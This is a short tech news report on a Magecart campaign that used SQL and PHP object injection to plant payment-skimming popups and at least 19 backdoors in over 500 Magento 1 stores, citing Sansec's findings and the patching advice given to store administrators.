In a nutshell: Magecart has struck again, and e-commerce sites are in a terrible pickle this time. The hacking groups have hit online businesses with malware intended to skim customer transaction information, which is nothing new. What is new is that the malicious code also opened at least 19 backdoors in the stores so that if admins remove it, hackers can quickly get back into the site.
Security researchers at Sansec say that they discovered that more than 500 online stores running the Magento 1 e-commerce platform were compromised in January. The hackers used a combination of SQL injection (SQLi) and PHP Object Injection (POI) to take over the Magento platform. Then a domain called "naturalfreshmall" served the malware to the now vulnerable sites.
"The Natural Fresh skimmer shows a fake payment popup, defeating the security of a (PCI compliant) hosted payment form," Sansec tweeted. "Payments are sent to https://naturalfreshmall[.]com/payment/Payment.php."
The Natural Fresh skimmer shows a fake payment popup, defeating the security of a (PCI compliant) hosted payment form. Payments are sent to https://naturalfreshmall[.]com/payment/Payment.php #masshack--- Sansec (@sansecio) January 26, 2022
With control over Magento, specifically, a plugin called "Quickview," Magecart executed a man-in-the-middle attack. Malware posing as a payment popup skimmed transaction data and sent it to Magecart-controlled servers.
Furthermore, the malicious payload contained files that created at least 19 backdoors to the websites. So removing the malware is not an effective mitigation. Administrators must first identify and remove all of the backdoors and then patch the compromised CMS.
Sansec says the vulnerability lies in a depreciated version of Magento 1 software from 2020. To patch their payment platforms, admins need to upgrade to the newest version of Adobe Commerce or use Magento 1 patches that they can download from the OpenMage project.